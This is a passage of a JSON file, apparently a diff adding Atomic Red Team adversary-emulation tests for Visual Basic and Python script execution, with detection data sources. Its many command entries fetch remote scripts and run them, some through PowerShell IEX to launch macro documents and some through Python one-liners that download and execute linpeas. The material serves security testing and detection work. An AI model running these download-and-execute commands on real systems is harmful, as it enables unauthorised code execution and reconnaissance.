"name": "Atomic Red Team Test - Command and Scripting Interpreter: Visual Basic" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n", + "source": "atomics/T1059.005/T1059.005.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Visual Basic" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1059.005", + "display_name": "Command and Scripting Interpreter: Visual Basic", + "atomic_tests": [ + { + "name": "Visual Basic script execution to gather local computer information", + "auto_generated_guid": "1620de42-160a-4fe5-bbaf-d3fef0181ce9", + "description": "Visual Basic execution test, execute vbscript via PowerShell.\n\nWhen successful, system information will be written to $env:TEMP\\T1059.005.out.txt.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "vbscript": { + "description": "Path to sample script", + "type": "String", + "default": "PathToAtomicsFolder\\T1059.005\\src\\sys_info.vbs" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Sample script must exist on disk at specified location (#{vbscript})", + "prereq_command": "if (Test-Path #{vbscript}) {exit 0} else {exit 1} ", + "get_prereq_command": "New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs\" -OutFile \"#{vbscript}\"" + } + ], + "executor": { + "command": "cscript #{vbscript} > $env:TEMP\\T1059.005.out.txt", + "cleanup_command": "Remove-Item $env:TEMP\\T1059.005.out.txt -ErrorAction Ignore", + "name": "powershell" + } + }, + { + "name": 
"Encoded VBS code execution", + "auto_generated_guid": "e8209d5f-e42d-45e6-9c2f-633ac4f1eefa", + "description": "This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution\na message box will pop up displaying \"ART T1059.005\"\n\nA note regarding this module, due to the way that this module utilizes \"ScriptControl\" a 64bit version of Microsoft Office is required.\nYou can validate this by opening WinWord -> File -> Account -> About Word\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The 64-bit version of Microsoft Office must be installed\n", + "prereq_command": "try {\n $wdApp = New-Object -COMObject \"Word.Application\"\n $path = $wdApp.Path\n Stop-Process -Name \"winword\"\n if ($path.contains(\"(x86)\")) { exit 1 } else { exit 0 }\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft Word (64-bit) manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059.005-macrocode.txt\" -officeProduct \"Word\" -sub \"Exec\"\n", + "cleanup_command": "Get-WmiObject win32_process | Where-Object {$_.CommandLine -like \"*mshta*\"} | % { \"$(Stop-Process $_.ProcessID)\" } | Out-Null\n", + "name": "powershell" + } + }, + { + "name": "Extract Memory via VBA", + "auto_generated_guid": "8faff437-a114-4547-9a60-749652a03df6", + "description": "This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this\nwe first create a string in memory then pull out the pointer to that string. 
Finally, it uses this pointer to copy the contents of that\nmemory location to a file stored in the $env:TEMP\\atomic_t1059_005_test_output.bin.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ms_product": { + "description": "Maldoc application Word", + "type": "String", + "default": "Word" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft #{ms_product} must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"#{ms_product}.Application\" | Out-Null\n $process = \"#{ms_product}\"; if ( $process -eq \"Word\") {$process = \"winword\"}\n Stop-Process -Name $process\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft #{ms_product} manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n", + "cleanup_command": "Remove-Item \"$env:TEMP\\atomic_t1059_005_test_output.bin\" -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + 
"data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes 
and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + 
"https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1059.006", + "command_list": [ + "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\";malicious_command = \"#{executor} #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} T1059.006-payload #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"T1059.006-payload\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"sh #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} #{payload_file_name} -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", 
\"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"#{script_url}\"' >> T1059.006.py\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python T1059.006.py\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} T1059.006-payload #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> 
#{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"sh #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"#{script_url}\"' >> T1059.006.py\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> 
T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python -c 'import py_compile; py_compile.compile(\"T1059.006.py\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} T1059.006-payload #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 
'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"sh #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "which_python=$(which python || which python3 || which 
python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"T1059.006.pyc\")'\n$which_python T1059.006.pyc\n" + ], + "commands": [ + { + "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\";malicious_command = \"#{executor} #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} T1059.006-payload #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"T1059.006-payload\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import 
requests;import os;url = \"#{script_url}\";malicious_command = \"sh #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} #{payload_file_name} -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"#{script_url}\"' >> T1059.006.py\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 'os.system(malicious_command)' >> T1059.006.py\n$which_python T1059.006.py\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = 
\"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} T1059.006-payload #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"sh #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> 
#{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > T1059.006.py\necho 'import os' >> T1059.006.py\necho 'url = \"#{script_url}\"' >> T1059.006.py\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> T1059.006.py\necho 'session = requests.session()' >> T1059.006.py\necho 'source = session.get(url).content' >> T1059.006.py\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> T1059.006.py\necho 'fd.write(source)' >> T1059.006.py\necho 'fd.close()' >> T1059.006.py\necho 
'os.system(malicious_command)' >> T1059.006.py\n$which_python -c 'import py_compile; py_compile.compile(\"T1059.006.py\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} T1059.006-payload #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"T1059.006-payload\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 
'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"sh #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> 
#{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + }, + { + "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"T1059.006.pyc\")'\n$which_python T1059.006.pyc\n", + "source": "atomics/T1059.006/T1059.006.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Python" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1059.006", + "display_name": "Command and Scripting Interpreter: Python", + "atomic_tests": [ + { + "name": "Execute shell script via python's command mode arguement", + "auto_generated_guid": "3a95cdb2-c6ea-4761-b24e-02b71889b8bb", + "description": "Download and execute shell script and write to file then execute locally using Python -c (command mode)", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "script_url": { + "description": "Shell script public URL", + "type": "String", + "default": "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh" + }, + 
"payload_file_name": { + "description": "Name of shell script downloaded from the script_url", + "type": "String", + "default": "T1059.006-payload" + }, + "executor": { + "description": "Linux shell", + "type": "String", + "default": "sh" + }, + "script_args": { + "description": "Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files.", + "type": "String", + "default": "-q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Verify if python is in the environment variable path and attempt to import requests library.", + "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", + "get_prereq_command": "pip install requests\n" + } + ], + "executor": { + "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c 'import requests;import os;url = \"#{script_url}\";malicious_command = \"#{executor} #{payload_file_name} #{script_args}\";session = requests.session();source = session.get(url).content;fd = open(\"#{payload_file_name}\", \"wb+\");fd.write(source);fd.close();os.system(malicious_command)'\n", + "name": "sh", + "cleanup_command": "rm #{payload_file_name} \n" + } + }, + { + "name": "Execute Python via scripts (Linux)", + "auto_generated_guid": 